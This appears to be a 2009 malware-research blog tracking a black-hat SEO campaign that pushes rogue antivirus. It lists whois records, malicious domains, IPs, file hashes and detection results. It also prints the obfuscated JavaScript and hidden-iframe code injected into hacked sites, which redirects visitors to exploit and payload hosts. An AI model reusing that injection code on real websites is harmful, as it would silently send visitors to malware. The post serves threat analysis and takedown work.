Sunday, March 29, 2009

Black Hat SEO and Rogue Antivirus p.3

The silent threat: Black Hat SEO and Rogue Antivirus

AntivirusPlus ZlKon Malware drop - liveinternetmarketingltd.com

READ THIS page if you need more information

In addition to fake scanner domain, recent research also reveal that several sites are
registered through "EVOPLUS LTD" with the information as follow:

Registrant:
Live Internet Marketing Limited ****@liveinternetmarketingltd.com
attn: Private Registrations
5285 Decarie Boulevard #100
Montreal, QC H3W3C2
Canada
+1-514-371-5650

Domain Name: LIVEINTERNETMARKETINGLTD.COM
Registrar: EVOPLUS LTD
Whois Server: whois.evonames.com
Referral URL: http://www.evonames.com
Name Server: NS1.LIVEINTERNETMARKETINGLTD.COM
Name Server: NS2.LIVEINTERNETMARKETINGLTD.COM
Status: clientDeleteProhibited
Status: clientTransferProhibited
Status: clientUpdateProhibited
Updated Date: 27-mar-2009
Creation Date: 20-feb-2009
Expiration Date: 20-feb-2010

Registered Through:
AdvancedHosters.com (http://www.AdvancedHosters.com)

******************************

Looking on google show absolutely no web presence apart from malware and pornography websites:

For "liveinternetmarketingltd": Malware domain drop and pornography websites
For "Live Internet Marketing Limited": Pornography websites
For "liveinternetmarketingltd.com": Pornography websites and malware domain found by Malware Domain List.

Looking on malwaredomainlist show 23 sites with the registrant information "liveinternetmarketingltd.com".

Some domain have been added to the list below:

antivirus-plus-new.com
antivirusplussite.com
bestinternetexamine.com
bestnetcheckonline.com
bestwebexamine.com
downloadantivirusplus.com
easynetcheckonline.com
easywebchecklive.com
easywebexamine.com
easywebscanlive.com
internethomecheck.com
linkcanlive.com
linkcanonline.com
linkcanpro.com
myantivirusplus.com
myinternetexamine.com
onlinescanweb.com
rapldhsare.com
safeyouthnet.com
security-check-center.com
securesoftinternet.com
theantivirusplus.com
websecurecheck.com
websmartcheck.com
websportscheck.com
yourinternetexamine.com
yournetascertain.com
yournetcheckonline.com
yournetcheckonline.com
yourwebexamine.com
yourwebscanlive.com
yourwebscanpro.com

**********************

SUSPENDED domain

Registrar: DIRECTI INTERNET SOLUTIONS PVT. LTD. D/B/A PUBLICDOMAINREGISTRY.COM

antivirusplus.biz
***
antivirusplus2009.net
Symantec Result
Registration Service Provided By: HIGH QUALITY HOST COMPANY
***
avplus2009.com
Symantec Result
PrivacyProtect - Registration Service Provided By: ERDOMAIN.COM
***
internet-check.net
PrivacyProtect - Registration Service Provided By: ERDOMAIN.COM
***
traffchecking.com

Registration Service Provided By: ERDOMAIN.COM
Registrant: uebochek - Luhansk Oblast,01001 - UA - uebochek@gmail.com


**********************

ACTIVE domain

***
av-plus-support.com
PrivacyProtect - Registration Service Provided By: ERDOMAIN.COM
***

antivirusplussite.com has a fake error page which redirect to downloadantivirusplus.com/buy.php?id=

downloadantivirusplus.com is also hosted on the same IP at ZlKon, also registered by "Live Internet Marketing Limited" and the fraudulent payment page is on the domain below:

https://secure-plus-payments.com/cgi-bin/nph-pr/pandora/softcore/buy_soft.php?productid=avplus3&advert=

209.8.25.204 - ns1.secure-plus-payments.com

Registration Service Provided By: RESELLERCLUB

Registrant:
Globo inc
John Sparck (sparck000@mail.com)
South reg, 14 st, 3
Atoll
,3290867
BB
Tel. +27.221994

"Globo inc" include: antivirus--plus.com, plus-antivirus.com (Already suspended)

**********************
Looking on spamhaus also reveal

newp-digital.com
webspywareremover2009.com
cure-soft.com [63.219.177.210]
innovagest2000s.com
secure-softwaretools.com [207.226.175.124]
**********************


Host on 94.247.2.215 [hs.2-215.zlkon.lv] AS12553

AS12553 PCEXPRESS-AS "DATORU EXPRESS SERVISS" Ltd.

Some screenshot






Analysis:


 File info:installer_1.exe 
    
 File size666112 bytes 
 MD503a1e599d66c64cd11eb5f20d3645767 
    
    
 Anubis:Report 
 ThreatExpert:Report 
 VirusTotal:Report 
    
 First received03.27.2009 17:40:50 (CET) 
 Results17/38 (44.74%) 
    
 Alias:Trojan.Win32.FakeXPA!IKa-squared 
  TR/Crypt.XPACK.GenAntivir 
  SHeur2.YCEAVG 
  (Suspicious) - DNAScanCAT-QuickHeal 
  Trojan.DownLoad.33473DrWeb 
  Trojan-Downloader.Win32.Delf.swqF-Secure 
  W32/FakeAV.NW!trFortinet 
  Trojan.Win32.FakeXPAIkarus 
  Trojan-Downloader.Win32.Delf.swqKaspersky 
  Generic Downloader.xMcAfee 
  Generic Downloader.xMcAfee 
  Trojan.Crypt.XPACK.GenMcAfee-GW-Edition 
  TrojanDownloader:Win32/Renos.BAOMicrosoft 
  Suspicious FilePanda 
  Troj/FakeAV-NWSophos 
  Trojan.Fakeavalert.BSunbelt 
  Trojan HorseSymantec 

We can see on this post that the file downloaded two or three days after is updated with a new code.

Result when running:
 
HTTP Request: 94.247.2.215 [hs.2-215.zlkon.lv]

GET: myantivirusplus.com/install/AntivirusPlus.exe
GET: myantivirusplus.com/install/InternetExplorer.dll
GET: myantivirusplus.com/cfg/dmns.cfg


 File info:AntivirusPlus.exe 
    
 File size1435136 bytes 
 MD5f0bc697765f31bd431e776387aca2c7f 
    
    
 Anubis:Report 
 VirusTotal:First Report 
 VirusTotal:Second Report 
    
 First received03.27.2009 14:17:34 (CET) 
 ResultsResult: 7/39 (17.95%) 
    
 Second time03.30.2009 05:23:52 (CET) 
 ResultsResult: 12/39 (30.77%) 
 New infoPrevx 
    
 Alias:Trojan.Win32.FakeXPA!IK 
  FakeAlert 
  Trojan.Win32.FakeXPA 
  Trojan:Win32/FakePlus 

 File info:InternetExplorer.dll 
    
 File size442368 bytes 
 MD58e428574cb9e4f680d1e28fe3ca673e8 
    
    
 VirusTotal:First Report 
 VirusTotal:Second Report 
    
 First received03.24.2009 16:12:30 (CET) 
 ResultsResult: 20/39 (51.29%) 
    
 Second time03.30.2009 05:23:52 (CET) 
 ResultsResult: 20/39 (51.29%) 
    
 Alias:Trojan.Win32.FraudPack.ify 
  Trojan.Win32.FakeAV.iy 
  Trojan.Win32.FakeXPA 
  Trojan:Win32/FakePlus 


Screenshot:
 

Saturday, March 28, 2009

Black Hat SEO and Rogue Antivirus p.2

The silent threat: Black Hat SEO and Rogue Antivirus

The World Wide Web Consortium and Rogue AV

Having your website hacked with IFRAME injected, trojans/backdoors?

Having your pages infected with redirection to rogue antivirus/antispyware?

Having your pages replaced with World Wide Web Consortium article and some
obfuscated javascript code append to them?


This page will show you some recent research about a malware campaign which has infected thousand of websites. In this campain all of these sites have been used to distribute fake antispyware called WinWebSec or FakeSpyGuard.(Sometimes called WinWebSecurity or SystemSecurity2009 with InternetAntivirusPro)

Since July/August 2008 hundreds of thousands of pages on legitimate domains were exploited having web pages stuffed with keywords (porn, celebrities, popular snacks) uploaded to them as a means of attracting victims via search engine results. In some cases, the homepage of the compromised site is being modified, appending hidden links to the malicious web page.

All info concluded that the attack was made via stolen FTP password, on all these domains.

An alarming observation also reveal that the activity grows at an exponential rate with malware/exploit code even more sofisticated.

You can find some IPs, network, domain used, example of hacked pages/websites and other malicious code injected into these domain on the links below or on other page on this blog.

The silent threat: Black Hat SEO and Rogue AV - 1
The silent threat: Black Hat SEO and Rogue AV - 2

*********************

Screenshot below show tons of websites also used in this rogue av malware campaign but with some World Wide Web W3C pages uploaded with javascript code injected.



Source of on of these site.





In a browser.



Deobfuscation results:

window.location = encodeURI(
"http://www.onlinedetect.com/in.cgi?7&tsk=aug-task13-r86-id67-t116-hst-16&type=l&seoref=" +
encodeURIComponent(document.referrer) + "&parameter=$keyword&se=$se&ur=1&HTTP_REFERER=" +
encodeURIComponent(document.URL) + "&default_keyword=XXX");

-----------------------

The source code also reveal thousand of hacked websites.The analysis of the javascript code redirect to onlinedetect.com or some domain used in this attack.
You can find information on this page.

Black Hat SEO - PDF Malware campaign

The silent threat: Black Hat SEO - PDF Malware campaign


Previously in March, Abode has released some security updates addressed to
vulnerabilities and exploits using Adobe Reader. Some links can be found below

McAfee Avert Labs: New Backdoor Attacks using PDF Documents
Trend Micro Malware Blog: Portable Document Format or Portable Malware Format?
SANS Internet Storm Center: Adobe/Acrobat 0-day in the wild?

Adobe Security Bulletin: Buffer overflow issue

Here is a complete example with sreenshots, data and analysis of a website
used in the PDF malware campaign and hosting a malicious application called SUTRA.

The application also known as "Traffic Management System" is explained by
McAfee AvertLabs on this page: Inside the malicious traffic

This cybercrime toolkit is actively used to manage traffic from compromised
websites and redirects visitors to exploits code or other malicious URLs with
fake codecs, rogue antispyware application, keyloggers, bankers trojan and many more.

We have another example of a compromised website explained here.
Screenshot of SUTRA can be found.

***

Now let's take a look of another website used.

The site is "salevisitor.net" 89.107.104.10
[Do not enter this site unless you know what you are doing]

The payload is located here "salevisitor.net/in.cgi?6" [Unstable - file not found at this time]

Just for your information, this is the structure of files/folders for SUTRA Traffic Manager

drwxr-xr-x (755) admin
drwxrwxrwx (777) data
drwxr-xr-x (755) files
drwxr-xr-x (755) html
drwxr-xr-x (755) install
drwxrwxrwx (777) memory
drwxrwxrwx (777) stats
drwxrwxrwx (777) admin/tmp
drwxrwxrwx (777) admin/tmp.web
   
-rwxr-xr-x (755) getos.cgi
-rwxr-xr-x (755) in.cgi
-rw-r--r-- (644) index.html
   
admin:  
-rwxr-xr-x (755) c.cgi
-rwxr-xr-x (755) center.cgi
-rwxr-xr-x (755) cron
-rwxr-xr-x (755) cron.sh
-rw-r--r-- (644) index.html
-rw-r--r-- (644) panel.html
drwxrwxrwx (777) tmp
drwxrwxrwx (777) tmp.web
-rwxr-xr-x (755) ub_fetcher
   
data:  
-rw-r--r-- (644) admin_forces.html
-rw-r--r-- (644) connection_type.html
-rw-r--r-- (644) connection_type_new.html
-rw-r--r-- (644) crontab_wizard.html
-rw-r--r-- (644) edit_force_data.html
-rw-r--r-- (644) edit_force.html
-rw-r--r-- (644) edit.html
-rw-r--r-- (644) edit_user.html
-rw-r--r-- (644) force_data.html
-rw-r--r-- (644) force.html
-rw-r--r-- (644) forces.html
-rw-r--r-- (644) forces_view.html
-rw-r--r-- (644) general_stat.html
-rw-r--r-- (644) GeoIP.dat
-rw-r--r-- (644) geoip.html
-rw-r--r-- (644) global_options.html
-rw-r--r-- (644) global_vars.html
-rw-r--r-- (644) import.html
-rw-r--r-- (644) index.html
-rw-r--r-- (644) key
-rw-r--r-- (644) login.html
-rw-r--r-- (644) lstats_export.html
-rw-r--r-- (644) lstats.html
-rw-r--r-- (644) main.html
-rw-r--r-- (644) navigation.html
-rw-r--r-- (644) page.html
-rw-r--r-- (644) pages_navigation.html
-rw-r--r-- (644) profile.html
-rw-r--r-- (644) pstats_export.html
-rw-r--r-- (644) pstats.html
-rw-r--r-- (644) pstats_index.html
-rw-r--r-- (644) register_done.html
-rw-r--r-- (644) register.html
-rw-r--r-- (644) search.html
-rw-r--r-- (644) show_bottom.html
-rw-r--r-- (644) show_data.html
-rw-r--r-- (644) show_header.html
-rw-r--r-- (644) stat_daily.html
-rw-r--r-- (644) static_stat.html
-rw-r--r-- (644) stat_main.html
-rw-r--r-- (644) stats.html
-rw-r--r-- (644) uptime_main.html
-rw-r--r-- (644) users.html
   
files:  
-rw-r--r-- (644) cgi.pm
-rw-r--r-- (644) counter.gif
-rwxr-xr-x (755) curl
-rwxr-xr-x (755) default.cgi
-rwxr-xr-x (755) gotourl.cgi
   
html:  
-rw-r--r-- (644) image files and javascript (gif, js)
   
install:  
drwxr-xr-x (755) freebsd4 // in.cgi
drwxr-xr-x (755) freebsd5 // in.cgi
drwxr-xr-x (755) freebsd6 // in.cgi
drwxr-xr-x (755) linux // in.cgi
   
stats:  
-rw-r--r-- (644) index.html

The admin page has no password on this server so you can enter and see stats like:




So now we know the IP, domain name, URLs used after redirection
but from were is coming the traffic?

Let's take a look of another folder "/memory/"

This folder has files like 1.access.log, 2.access.log, 5.access.log,
25.access.log, 70.access.log etc...

Some related topics on this blog refer to onlinedetect.com, 0day33hours.com for another malware campaign... Similars files can be found using google. here and here

2.access.log - The file contain the IP of visitors reaching infected
websites, some are in Czech Republic, Israel, Russia, Turkey etc.
The file also reveal the URL of some compromised websites
were the malicious obfuscated javascript code has been inserted.



Line 1:

hxxp://www.met[BLOCKED]p.com.pl/meta...........
Javascript Analysis

Line 23: 77.250.xx.xx

http%3A%2F%2Fwww%2Este[BLOCKED]tos%2Enl%2Find.....
Javascript Analysis

hxxp://www.gif[BLOCKED]za.pl/gify/baj...
Javascript Analysis

The analysing confirm that all these site has the same code added

<script>
if (!myia){ document.write(unescape('
%3c%69%66%72%61%6d%65%20%6e%61%6d%65%3d%63
%31%35%20%73%72%63%3d%27%68%74%74%70%3a%2f
%2f%73%61%6c%65%76%69%73%69%74%6f%72%2e%6e
%65%74%2f%69%6e%2e%63%67%69%3f%32&%27%2b%
4d%61%74%68%2e%72%6f%75%6e%64%28%4d%61%74%
68%2e%72%61%6e%64%6f%6d%28%29%2a%32%31%35%
32%38%29%2b%27%37%30%65%33%66%35%31%63%35%
27%20%77%69%64%74%68%3d%35%32%20%68%65%69%
67%68%74%3d%34%31%34%20%73%74%79%6c%65%3d%
27%64%69%73%70%6c%61%79%3a%20%6e%6f%6e%65%
27%3e%3c%2f%69%66%72%61%6d%65%3e'));
}
var myia = true; </script>
 
<iframe name=c15 src='http://salevisitor.net/in.cgi?2&'+
Math.round(Math.random()*21528)+'70e3f51c5'
width=52 height=414 style='display: none'></iframe>

Analysis report for hxxp://salevisitor.net/in.cgi?2

The script load a PDF located here quara-best.com/[BLOCKED]e30/pdf.php?id=5352
which then load this executable --> VirusTotal Report

******************

Some other related link:

Honeynet Malware Detail
Analysis of hxxp://eternal.alfamoon.com here

MySpace Profile Attacked (screenshot below)



loyaldown-loyaltube Fake Codec and RogueAV

loyaldown09.com, loyaltube10.com Fake Codec and Rogue Antivirus

loyaldown09.com, loyaltube10.com are site that distribute fake codec.
We also have on this network sites which host rogue application like
XP-Police-Antivirus and Win-PC-Defender

Fake codec and fake scanner page screenshot

loyaltube10.com [213.163.65.10]
loyaldown09.com [213.163.65.9]

hxxp://loyaltube10.com/scan/?id=..



hxxp://loyaltube10.com/tube/?id=...&title=adult+movie




Analysis:


Redirectors used: hxxp://us-euro.biz/in.cgi?4&parameter=wifi
[195.190.13.234]
Analysis here

 Site URLs:hxxp://loyaltube10.com/scan/?id=.. 
  hxxp://loyaltube10.com/tube/?id=197&title=adult+movie 
  hxxp://loyaldown11.com/codec/.exe 
    
   hxxp://loyaldown11.com/codec/189.exe 
  hxxp://loyaldown11.com/codec/197.exe 
    
    
 File info:codec.exe 
    
 File size107011 bytes 
 MD5704298be5c6bf8671517c79b827c9206 
    
    
 ThreatExpert:Report 
 VirusTotal:Report 
 Anubis:Report (related: WinPC Defender) 
    
 First received03.29.2009 01:17:30 (CET)
 
 Results6/39 (15.39%) 
    
 Alias:(Suspicious) - DNAScanCAT-QuickHeal 
  Suspicious File eSafe 
  Downloader-BONMcAfee 
  Downloader-BONMcAfee+Artemis 
  TrojanDropper:Win32/Insebro.AMicrosoft 
  Malware-Cryptor.Win32.ZorqVBA32 



 Site URLs:hxxp://tubeloyal.com/scan/?id-.. 
  hxxp://loyaldown11.com/codec/.exe 
    
    
 File info:codec.exe 
    
 File size107008 bytes 
 MD5eb61517f7f0906dc0e60f0e0afd1bbf1 
    
    
 ThreatExpert:Report 
 VirusTotal:Report 
 Anubis:Report (related: WinPC Defender) 
    
 First received03.29.2009 01:41:38 (CET)
 
 Results6/39 (15.39%) 
    
 Alias:(Suspicious) - DNAScanCAT-QuickHeal 
  Suspicious File eSafe 
  Downloader-BONMcAfee 
  Downloader-BONMcAfee+Artemis 
  TrojanDropper:Win32/Insebro.AMicrosoft 
  Malware-Cryptor.Win32.ZorqVBA32 

Associated websites:
 
[213.163.65.10]
loyaltube.com
loyaltube09.com
loyaltube10.com
rakompoporyadkunazaryadku.com
setupdatdownload.com
tubeloyal.com
velzevuladmin.com
win-pc-defender.com
xp-police-09.com
xp-police-2009.com
xp-police-antivirus.com
xp-police-av.com
xp-police-engine.com

[213.163.65.9]
loyaldown09.com
loyaldown11.com

av-best-info Anti-VirusN1 Rogue FakeXPA

av-best.info "VirusDoctor Online Scan" Anti-Virus1 Rogue FakeXPA

av-best.info is a site that distribute AntivirusN1 a rogue antivirus application.
AntiVirusN1 displays fake alerts in order to persuade users buying it.

Registry keys/values must be deleted with antivirus / antispyware.
Anti-Virus Number-1 can be removed by stopping the following processes

- Kill processes: N1Two.exe, N1i.exe, 2.exe, 3.exe
- Unregister DLLs (regsvr32 /u [dll_name]): QWProtect.dll

- Delete files and folders:

  • ► C:\Documents and Settings\All Users\Application Data\N1
  • ► %CommonAppData%\N1
    ► %CommonPrograms%\Anti-Virus Number-1

This site appear to be normal at first sight.

Antivirus 1 Site Screenshot

Antivirus 1 Payment system

The payment system for this fraudulent and rogue program is made via Plimus (screenshot below)

Antivirus 1 Payment system by Plimus

But the site has been reported as malicious by some users. Here is the fake scanner

Site screenshot:

Fake Security Warning Message:

Adware.Win32.Look2me.ab Virus Critical
Backdoor.Win32.Haxdoor.gu Virus High
Trojan-Downloader.Win32.Small.dge Virus High
Trojan Horse IRC/Backdoor.SdBot4.FRV Virus Medium
W32.Benjamin.Worm Virus High
W32.Mypics.Worm.36352 Virus Medium
W32.Yaha.B@mm Virus Critical
Trojan Horse Generic11.OQJ Virus High
Magic DVD Ripper Virus High
Recommend: Click "Start Protection" button to erase all threats

Fake Security Warning Message

Fake Security Warning Message: Threat detected

Fake scanner page


Fake messages:

Fake Security Warning Message

Alert! Your PC is at risk of virus and spyware attack.

Your system requires immediate check!i
System Security Scanner will perform a quick and free scan of your PC for viruses and spyware programs.

Associated website [174.142.113.206] [ip-174-142-113-206.static.privatedns.com]

scanner.av-best.info
download.av-best.info

Analysis:


 Site URLs: hxxp://scanner.av-best.info/scan.php?campaign=mmb_35930207
43&landid=4
 
  hxxp://download.av-best.info/install.php?campaign=mmb_3593020743
&country=en&counter=0&campaign=mmb_3593020743&landid=4
 
    
    
 File info:AntiVirusInstaller.exe 
    
 File size53278 bytes 
 MD5f8d38325d9570ce3320f04e9d5278466 
    
    
 ThreatExpert:Report 
 VirusTotal:Report 
 Anubis:Report 
    
 First received03.28.2009 19:18:31 (CET)
 
 Results8/39 (20.52%) 
    
 Alias:TR/Crypt.CFI.GenAntiVir 
  Win32.Packed.Krap.c.4CAT-QuickHeal 
  Trojan.DownLoad.33135 DrWeb 
  Suspicious File eSafe 
  Trojan.Crypt.CFI.GenMcAfee-GW-Edition 
  Trojan:Win32/FakeXPAMicrosoft 
  Suspicious FilePanda 
  Cryp_FakeAV-11TrendMicro 

When running:



 HTTP Requests:[70.38.11.165] 
  http://70.38.11.165/admin/cgi-bin/get_domain.php?type=site 
  Content html: av-best.info 
    
  http://70.38.11.165/admin/cgi-bin/get_domain.php?type=download 
  Content html: download.av-best.info 
    
  [174.142.113.206] 
  hxxp://download.av-best.info/en/PE/2.exe 
  hxxp://download.av-best.info/en/PE/3.exe 
  hxxp://download.av-best.info/en/PE/en/PE/N1.CAB  
  hxxp://download.av-best.info/en/PE/en/PE/QWProtect.dll  
  hxxp://download.av-best.info/en/PE/en/PE/svchost.exe  
    
    
 File info:2.exe 
 File size53248 Bytes 
 MD5364f5d30dba520937f9f3b7979b389b1 
    
 VirusTotal:Report Alias: Trojan.Win32/FakeXPA 
  Received on 03.28.2009 22:08:07 (CET) 
  8/39 (20.52%) 
 ThreatExpert:Report 
 Prevx:Report 
    
    
 File info:3.exe 
 File size257536 Bytes 
 MD5b7d14c7ea7844057efcfd1a41ddc530f 
    
 VirusTotal:Report Alias: Trojan.Win32/FakeXPA 
  Received on 03.28.2009 22:08:18 (CET) 
  6/39 (15.39%) 
 ThreatExpert:Report 
    
    
 File info:AntiVirusInstaller.exe 
 File size53278 Bytes 
 MD5f8d38325d9570ce3320f04e9d5278466 
    
 VirusTotal:Report Alias: Trojan.Win32/FakeXPA 
  Received on 03.28.2009 22:08:19 (CET) 
  8/38 (21.06%) 
 ThreatExpert:Report 
    
    
 File info:N1.CAB 
 File size504489 Bytes 
 MD5c37aa0887be14b68381301e24ddaf8fb 
    
 VirusTotal:Report Alias: Trojan.Win32/FakeXPA / Trojan.Win32.Tibs 
  Received on 03.28.2009 22:08:51 (CET) 
  5/38 (13.16%) 
    
 File info:N1.exe 
 File size527360 Bytes 
 MD52d6a49219639d63428b91eb7647ce491 
    
 VirusTotal:Report Alias: Trojan.Win32/FakeXPA / Trojan.Win32.Tibs 
  Received on 03.28.2009 22:09:09 (CET) 
  5/38 (13.16%) 
 ThreatExpert:Report 
    
    
 File info:QWProtect.dll 
 File size697856 Bytes 
 MD51b6c35cb941eaa9f6325a449cb6770b0 
    
 VirusTotal:Report Alias: Trojan.Win32/FakeXPA 
  Received on 03.28.2009 22:09:01 (CET) 
  4/38 (10.53%) 
 Prevx:Report 
 ThreatExpert:Report 
    
    
 File info:svchost.exe  
 File size80896 Bytes 
 MD5c2613b801da4c8b6967d6da05c0443ed 
    
 VirusTotal:Report Alias: Trojan.Win32/FakeXPA 
  Received on 03.28.2009 22:08:47 (CET) 
  10/38 (26.32%) 
 Prevx:Report 
 ThreatExpert:Report 

Result when running:
 
Display fake BlueScreen "MALWARE.MONSTER.DX_NEW_0xA21518F0"

Fake bluescreen message: MALWARE.MONSTER.DX_NEW_0xA21518F0

Rogue Anti-Virus Number-1

Anti-Virus Number-1 Rogue Application Screenshot:
 



Friday, March 27, 2009

Black Hat SEO and Rogue Antivirus

The silent threat: Black Hat SEO and Rogue Antivirus

Messages telling you to install and update security software for your computer is a scary message.
This tactic is known as scareware: http://en.wikipedia.org/wiki/Scareware

Related article about "Free Security Scan" alerts from the Federal Trade Commission
Court Halts Bogus Computer Scans
"Free Security Scan" Could Cost Time and Money



Since several months ago, massive attacks (obfuscated javascript inserted - IFRAME to inject backdoors/keyloggers), thousand of hacked websites used to distribute rogue antivirus have been detected by major antivirus vendors, cyber intelligence labs and other security companies.

The exponential growth of rogue antivirus distribution through legitimate websites remain silent as the tactic used by the creators continued to become more sophisticated.

Related article: Scammers making '$15m a month' on fake antivirus
PandaLabs: 22,000 New Malware Samples Detected Every Day in 2008
PandaLabs Annual Report

Rogue AV Detections in 2008

Sites on this blog refers to rogue antispyware which display misleading scan alerts and mostly installed on computer's victim without user consent throught infected websites (LEGITIMATE infected websites).


UPDATE:

The site now include IPs / botnet C&C / data logs exposed, links to LIVE urls exploits/vulnarabilities (flash - pdf) and domains with their relations, route, AS and malicious scripts found on
compromised websites related to the same campaign.



If you arrived to this page through a search engine about a domain in this blog, some removal information can be found on the links below. Sites analysis will be created and updated as new sites will be found. Twice or more a day if needed.

If you arrived to this page and you are interested to find some information about these attacks,
IPs domains and networkd used, here are some links used with details about this malware campaign

Related article:

Black Hat SEO and Rogue Antivirus: Rogue Fake SpyGuard Malware Defender 2009
Black Hat SEO and Rogue Antivirus: Fraudulent payment processors Antivirus360
Black Hat SEO and Rogue Antivirus: Fake Scanner RapidAntivirus templ. AntivirusPlus
Black Hat SEO and Rogue Antivirus: WinWebSecurity InternetAntivirusPro
Black Hat SEO and Rogue Antivirus: ZlKon Malware Drop
Black Hat SEO and Rogue Antivirus: AntiSpyware Pro 2009
Black Hat SEO and Rogue Antivirus: Rogue Fake SpyGuard
Black Hat SEO and Rogue Antivirus: WinWebSecurity InternetAntivirusPro
Black Hat SEO and Rogue Antivirus: WinWebSecurity InternetAntivirusPro new variants

Black Hat SEO and Rogue Antivirus:

Part. 1) Black Hat SEO and Rogue Antivirus
Part. 2) Black Hat SEO and Rogue Antivirus: The World Wide Web Consortium Mystery
Part. 3) Black Hat SEO and Rogue Antivirus: AntivirusPlus ZlKon and liveinternetmarketingltd.com
Part. 4) Black Hat SEO and Rogue Antivirus: Full or Rogues
Part. 5) Black Hat SEO and Rogue Antivirus: Full of Hacks
Part. 6) Black Hat SEO and Rogue Antivirus: Analyzing the tactic p.1
Part. 7) Black Hat SEO and Rogue Antivirus: Analyzing the tactic p.2
Part. 8) Black Hat SEO and Rogue Antivirus: Fake AV + Rootkit TDSS / Alureon / DNSChanger

Black Hat SEO - Exploit, scripts, botnet C&C, hacks toolkit etc.

Part. 1) Black Hat SEO - Botnets, Scripts, Exploits, Hacks: Thousand of domain attacked
Part. 2) Black Hat SEO - Cyber Crime Toolkit Exposed: Welcome to LuckySploit:) ITS TOASTED
Part. 3) Black Hat SEO - Botnets, Scripts, Exploits, Hacks: Triple threats
Part. 3) Black Hat SEO - Botnets, Scripts, Exploits, Hacks: Crimaware toolkits in the wild


And here we have a list of fake scanner websites used in the attack which infect thousand of websites to distribute malware also known as WinWebSec (WinWebSecurity or SystemSecurity2009): Black Hat SEO and Rogue Antivirus

Note:

Other rogue av like AntivirusPlus through this list has been detected recently

Many more like under the name of FakeSpyGuard, VirusRemover, WinAntiVirus2008, SpywareRemover2009, and some variant of "Trojan Hiloti" through this list

Similar attacks with Google search strings :

In 2008: We have an example with "Antivirus 2009" on the Trend Micro Malware Blog:
A Million Search Strings to Get Infected

A few days ago: On the CA website "onlinestabilityworld.com" is cited. The article is here:
Rogue Security Software keeps on hitting Google searches

Another list of fake codec websites in March on the Dancho Danchev's blog alsocited on this blog
Bogus LinkedIn Profiles Redirect to Malware and Rogue Security Software

And recent search also reveal the use of a powerfull javascript library jQuery - the screenshot below has been retreived from a legitimated infected website.

Deobfuscated result is:



The ip is 94.247.2.195 (ZlKon)




Network used for hosting these malicious website are

Starline Web Services in Estonia
Zlkon in Latvia
netdirekt e.K. in Germany
Hetzner Online AG in Germany
Ural-NET in Russia
Eurohost LLC in Ukraine
GloboTech via Olexij Khrenov in Ukraine
Joint Multimedia Cable Network in Ukraine
NTColo Networks in Ukraine
Plitochnik Lux LTD in Ukraine
Coloquest in US
Netelligent Hosting Services Inc in US
and some other in China, Moldavia.
IPs, AS and network used can be found on this blog.

-------------
New sites used

on March 28: slot4scan.com, scan4fuse.com, list4scan.com, scan4home.com, gotimescan.com
on March 29: mainscan6.com, scan4plus.info, scan4open.com

on March 30:

logscan6.com
scan4way.com [redirection by gostepscan.com]
5scanav.com and scan5plus.com [redirection by gowithscan.com]
new4scan.info,scan4live.info

April:

best4scan.info, best6scan.info,pro4scan.info,scanline6.com, scan6log.com, scan6main.com, scan6now.com,zpmuwbtqqwkw.net
Analysis here

-------------


Related article: The rash of rogue av (PDF)

Related article about McColo Business:
Similar network at UltraNet Ltd in Lavtia
HostExploit’s Cyber Crime Series (PDF)

The list on your right hand side are latest websites used in this malware campaign. (Updated daily)

Some interesting links about malicious traffic at DATORU EXPRESS SERVISS - ZlKon in Latvia
Pages related to the same attack. (Included some other problems, SPAM, botnet etc...)

December  15, 2008:
FakeAV and Codecs
http://realsecurity.wordpress.com/2008/12/15/sources-of-badness-zlkon/

December  19, 2008:
SPAM IP Detected
http://forums.pligg.com/general-help/16374-spam-ip-94-247-2-29-kill.html
http://www.projecthoneypot.org/ip_94.247.2.29

McAfee Avert Labs Blog
Monday January 5, 2009
Explanation of the so-called “Traffic Management System” - Inside The Malicious Traffic Business
http://www.avertlabs.com/research/blog/index.php/2009/01/05/inside-the-malicious-traffic-business/
We also have an complete example here. From the visitor to the legitimate infected website (with logs, screenshot, ips and analysis of the malicious website as well as the technic used. i.e: SUTRA traffic redirection, PDF exploit to inject backdoors etc..)

Zeus Tracker
https://zeustracker.abuse.ch/monitor.php?host=94.247.3.211

Wednesday January 7, 2009
Google Code Project Abused by Spammers
http://www.avertlabs.com/research/blog/index.php/2009/01/07/google-code-project-abused-by-spammers/

January 19, 2009
Inaccurate whois details
http://msmvps.com/blogs/spywaresucks/archive/2009/01/21/1663955.aspx

January 2009
http://voices.washingtonpost.com/securityfix/2009/01/troubled_ukrainian_host_sideli.html
Paragraph:Sunbelt's Jordan said those responsible for DNSChanger appear to have begun moving to a new base of operations over the past few weeks, to a network in Latvia, called "Zlkon.lv."

http://ddanchev.blogspot.com/2009/02/diverse-portfolio-of-fake-security.html
http://ddanchev.blogspot.com/2009/02/template-ization-of-malware-serving.html

Paragraph from the ddanchev.blogspot.com:

Interestingly, within the mirrored copy now tweaked and distributed for free using free image hosting services as infrastructure provider for the layout, there are also leftovers from the original campaign template that they mirrored - which ultimately leads us to DATORU EXPRESS SERVISS Ltd (AS12553 PCEXPRESS-AS) or zlkon.lv In the wake of UkrTeleGroup Ltd's demise -- don't pop the corks just yet since the revenues they've been generating for the past several years will make it much less painful -- a significant number of UkrTeleGroup customer, of course under domains, have been generating quite some malicious activity at zlkon.lv for a while.

January 25, 2009
Rogue software - FakeAV
http://pandalabs.pandasecurity.com/archive/New-Rogue_3A00_-Total-Defender.aspx

February 5, 2009
Similar attack with the same added code between like <!-- ad --> <!-- /ad -->
(Same code here)
http://www.aladdin.com/AircBlog/post/2009/02/The-latest-undetected-malweb-by-RBN.aspx

Other: http://www.aladdin.com/AircBlog/post/2009/02/Iraq's-embassy-in-Tehran-website-compromised-by-hackers.aspx

Wednesday February 25, 2009
Google Trends Abused to Serve Malware
http://www.avertlabs.com/research/blog/index.php/2009/02/25/google-trends-abused-to-serve-malware/